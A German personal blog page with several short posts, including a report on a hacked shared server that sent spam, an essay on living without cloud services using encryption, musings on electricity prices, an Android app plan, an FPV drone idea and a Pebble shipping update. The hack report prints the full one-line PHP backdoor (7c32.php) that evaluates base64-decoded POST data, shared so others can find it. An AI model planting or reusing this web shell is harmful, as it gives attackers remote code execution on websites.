Sebbis Blog

Kategorie: Sebbi

Was mich bewegt

  • Über 7c32.php und Mailspam

    Der Server auf dem dieses Blog läuft, hostet auch einige andere Webseiten. Eine davon wurde gehackt und hat die letzten Tage unglaubliche Mengen an Spammails versendet. Kann passieren und passiert tatsächlich auch recht oft. Nur dieses Mal war es einfach eine Datei namens 7c32.php, die per FTP hochgeladen wurde und keine Sicherheitslücke von WordPress oder was auch immer man so laufen hat. Davor eine Datei ftpchk3.php um zu prüfen, ob das FTP Verzeichnis auch per Web erreichbar ist.

    Der Angreifer wusste also den Benutzernamen, das Passwort und auf welcher Domain dieses Skript laufen würde und hat das genutzt um mit der PHP Funktion mail() Spam zu verschicken. Mitgeschnitten in einem Wifi Netz? Gezielter Hack? Trojaner? Wir wissen es nicht.

    Das scheint übrigens ein älterer und vermutlich automatisierter Angriff zu sein. Eine Googlesuche nach 7c32.php bringt einige viele Suchergebnisse, die zum Teil bis 2012 zurückreichen.

    Wie dem auch sei … einfach mal in der eigenen Installation von was auch immer (WordPress, Joomla, Webseite mit PHP) nach einer Datei 7c32.php (im Unterverzeichnis css) suchen. Die Datei ftpchk3.php wurde vom Angreifer wieder gelöscht, laut Netz enthält sie aber auch nur den Code:
    echo "OK"

    Be safe!

    P.S.: Der Inhalt von 7c32.php:
    < ? php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ? >

  • Es leuchtet blau

    Es leuchtet blau.

    Rambo

  • Ich teste gerade die verschiedenen Formatvorlagen von WordPress!

    Ich teste gerade die verschiedenen Formatvorlagen von WordPress!

  • Neues Theme

    In der Hoffnung gegen Blogtiefschlaf und Sommerloch anzukämpfen habe ich mal auf das neue WordPress Theme Twenty Thirteen umgestellt. Sieht gut aus und hat einige Formatvorlagen, die ich hiermit mal ausprobiere. Das ist eine Kurzmitteilung ;-)

  • Kann man eigentlich „cloudfrei“ leben?

    Wir werden totalüberwacht! Das ist Fakt und liegt auch daran, dass sich kaum jemand über Verschlüsselung Gedanken macht (meinen öffentlichen PGP Schlüssel findet ihr auf der Kontaktseite) und fröhlich Dienste von verschiedenen Webseiten nutzt.

    Bei vielen Diensten kann man nichts dagegen unternehmen, denn wenn ich bei Amazon einkaufen möchte, dann muss ich mit deren Webseite interagieren. Möchte ich Google Dienste wie App Engine nutzen oder einen anderen Hosting Dienst ist das ebenso der Fall. In diesem Fall kann ich allerdings auf dem Server alles verschlüsselt ablegen (sofern er nur als Speicher verwendet wird, wenn er die Daten verarbeiten soll, geht das natürlich nicht komplett).

    Kommen wir langsam zum Punkt. E-Mails, Instant Messaging, Telefongespräche, Terminplan, Datenspeicher … kann man das sicher – also verschlüsselt – und ohne „Cloud“ benutzen?

    • Email: hier gibt es Ende-zu-Ende Verschlüsselung schon seit Anbeginn der Zeit. PGP/OpenPGP/GnuPG machen es möglich. Der Aufwand ist recht niedrig, aber trotzdem benutzt es keiner wirklich. Deshalb wäre zumindest die Ablage der Mails auf dem eigenen Server in einen verschlüsselten Container (pro Nutzer!) sinnvoll. Web Emaildienste sollten tabu sein.
    • Instant Messaging: Whatsapp & Co haben diverse Lücken. Als Alternativen bieten sich z.B. Threema (meine ID dort: B327U2MZ) oder Whistle.im an. Beide noch nicht so ausgereift wie die etablierten Messenger, aber dafür wird die Kommunikation verschlüsselt!
    • Telefon: das ist eine schwierige Sache … GSM ist ja eigentlich schon verschlüsselt, aber natürlich kann das auch abgehört werden. Eine Ende-zu-Ende Verschlüsselung ist da mit normalen Smartphones relativ schwer möglich, aber es gibt ja noch VoIP. RedPhone sieht nach einer interessanten App aus, das zu ermöglichen … oder man verwendet eine erfundene Codesprache? ;-)
    • Terminplan, Todolisten, etc könnten gut mit einer Software namens Owncloud funktionieren. Lokal oder bei einem Hoster installiert kann man damit ziemliche viele Clouddienste nachbilden und so der allgemeinen Totalüberwachung entkommen.
    • Daten: ebenfalls Owncloud, eigener Server, verschlüsselte Uploads, etc

    Es wäre also möglich die Kommunikation mit seinen Mitmenschen komplett abhörsicher ablaufen zu lassen und ich bin mir sicher, dass die wirklich bösen Buben schon schlau genug sind ebenfalls abhörsicher zu kommunizieren. Die Überwachung trifft also nur Dumme und verletzt Grundrechte … und auch wenn es kein guter Vergleich ist, es ist ein wenig wie bei DRM: die bösen Raubkopierer kriegen davon nicht mit und der ehrliche Kunde hat nur Probleme damit und Einschränkungen ohne Ende.

    Und wie seht ihr das? Kommunikation egal genug, dass sie komplett für spätere Ermittlungen aufgezeichnet werden darf (Stichwort: ich hab ja nichts zu verbergen … *würg*)? Oder doch vielleicht versuchen Freunde zu überzeugen ein wenig mehr darauf zu achten?

    P.S.: Ausnahmen bestätigen die Regel oder so … bevor mir jemand damit kommt, dass ich hier blogge und auf Facebook, Instagram, Twitter, Google+ und in diversen Foren und Mailingslisten quasi-öffentlich schreibe und Bilder hochlade … ja, das ist aber gewollt so! Mag sein, dass man so auch ein Profil von einer Person erstellen kann, aber es fehlt ein ganz entscheidender Teil und über dessen Verteilung/Nutzung – wie man nun spätestens seit Snowden weiß – hat man keine Kontrolle mehr … außer Abschalten und die Kommunikation komplett einzustellen oder eben Verschlüsselung. Verstanden?

  • Negative Strompreise und billiger Nachtstrom

    Ich habe mich gerade gefragt, ob es eigentlich noch Stromtarife mit günstigem Nachtstrom gibt, weil da brauchen ja nicht so viele Leute Strom und deshalb günstiger oder so … aber halt! Macht das überhaupt noch Sinn?

    Wenn man sich die Charts der Europäischen Strombörse anschaut, dann ist in Deutschland der Strom zwischen 11 und 18 Uhr am billigsten, weil es hier Überproduktion durch Solaranlagen gibt.

    Das heißt doch eigentlich, dass die Stromanbieter lieber günstigere Tagtarife anbieten sollten, damit Mittags mehr Strom verbraucht wird und der Strom nicht so verscherbelt werden muss. Liege ich falsch?

    Dann kämen so Tage wie der 16. Juni vielleicht seltener vor. Auch interessant ist die Nacht auf den 25. Dezember 2012 … hier wurde wohl auch zu viel Strom produziert und man musste dafür bezahlen, dass andere den Strom nehmen …

  • Sommer

    Weil die letzten 3 Wochen Sommer war, keine Einträge hier ;-)

    P.S.: Wenn ihr immer noch nicht euren WordPress-Nutzer „admin“ umbenannt habt und/oder wenigstens das Plugin Limit Login Attempts installiert habt, dann macht euch darauf gefasst, dass euer Blog eventuell gekapert wird. Es ist unglaublich wie oft am Tag hier Passwörter an der Loginmaske ausprobiert werden :/

  • Android Projekt

    Ein Blog will mit Inhalten gefüllt werden und ich, der für Redeflashs bekannt ist, muss jetzt einfach mal ein paar Sachen runterschreiben ;-)

    Android! Ich mag Android und habe schon einiges dafür gemacht, aber bis auf die Illusions Uhr nichts was ich selbst veröffentlicht habe. Das soll sich ändern und ich will darüber bloggen. Wöchentlich, alle zwei Wochen, egal … ihr sollt teilhaben.

    Was wird es werden? Das weiß ich noch nicht so recht. Etwas simples! Ein Spiel? Vielleicht. In den letzten Wochen habe ich ein wenig mit dem Rift Devkit herumgespielt und auch eine rudimentäre Android Bibliothek dafür geschrieben, d.h. eventuell wäre es Spiel mit 3D Grafik (und Rift Unterstützung für den speziellen Kick) angebracht.

    Damit auch ein richtiger Anreiz da, sollte das Spiel bzw. die App nicht kostenlos sein. Bezahl-App oder Free-to-play oder Werbeeinblendungen? Ihr werdet es hier erfahren (ob und wie und überhaupt man vom Google Play Store direkt leben kann oder es eher nicht so einfach ist) ;-)

    Edit: zusammen mit Andreas habe ich schon mal so etwas versucht – eine Telefonwählton Musik App. Ich denke ich werde zuerst einmal diese App aufpolieren und fertigstellen.

  • FPV Träumerei

    Damit es irgendwo festgehalten ist ein kleiner Tagtraum wie ich mir FPV Fliegen bzw. eine Lösung für mich vorstelle.

    Das Flugzeug bzw. der Quadrocopter überträgt ein analoges Videosignal an die Bodenstation. Digital wäre natürlich schöner, aber hier gibt es noch keine brauchbaren Lösungen. Momentan benutze ich dafür eine fest (Flugzeug) bzw. beweglich (Copter) montierte GoPro. Großes Sichtfeld und zeichnet gleich noch das Video in guter Qualität auf. Vorstellbar wäre hier auch ein Raspberry Pi mit dem neuen Kameramodul, der dann auch noch ein wenig Steuerung/Logik übernehmen könnte. Vielleicht kann man so auch komplett auf einen Arduino mit MultiWii verzichten … wer weiß?

    Wie dem auch sei, die eigentlich Arbeit wäre in der Bodenstation zu erledigen. Ein Raspberry Pi oder evtl. auch ein Android Tablet würden dann das analoge Video zusammen mit Telemetrie empfangen und daraus ein hübsches „Cockpit“ für die Oculus Rift bereitstellen. Mit einer GoPro als Quelle könnte man sich virtuell relativ nah vor das Bild setzen und die Kopfbewegungen lassen einen trotzdem in der Welt herumschauen (im begrenzten Sichtfeld der Kamera). Wenn die Kamera beweglich montiert wäre (Copter) könnte man die Kopfbewegung auch per Lehrer/Schüler-Kabel über die Fernsteuerung zurück an das Flugmodell senden. Auf dem virtuellen Boden könnte man ein Satellitenbild oder eine normale Karte mit der Position einblenden.

    Proof of Concept auf einem Laptop. Zeitplan … tja, daran hapert’s, aber das Jahr ist ja noch jung ;-)

  • Neuigkeiten zur Pebble

    Für uns Kickstarter Backer aus Deutschland gab es leider ein Problem mit dem Zoll, so dass kaum einer seine Pebble bereits am Arm trägt … auch drei Monate nach den ersten Auslieferungen scheint das Problem noch nicht ganz gelöst, aber immerhin hat Pebble jetzt eine Email geschrieben, dass sie noch an uns denken.

    Hello,

    Thank you for your patience as we work to resolve the shipping issues with Germany.

    We have received your claim and wanted to update you on our progress. We are currently in touch with German regulatory agencies and customs officials to identify the steps required to ensure delivery of Pebbles in Germany.

    We are already implementing some changes to paperwork and official documents, though resolution with the authorities may take some time. We will provide you with another update once we have clear direction and action from the authorities.

    In the meantime, we have improved our invoices and provided a German manual online (available for download on our Help Portal: http://help.getpebble.com/customer/portal/articles/1042980-documents-for-customs-invoice-or-ce-ic-certification), which has enabled some backers to retrieve their Pebbles.

    For any Pebbles requiring reshipment, we will wait until all regulatory and customs issues are resolved before reshipping so that we are sure your Pebble can get to you.

    Thank you again for your patience with this matter. We will be in touch once we have additional details.

    Kind regards,

    Sarah

    Schön, aber trotzdem immer noch ärgerlich, dass sie sich nicht vorher informiert haben. Immerhin bekamen sie fast 10 Millionen Dollar zum Spielen :/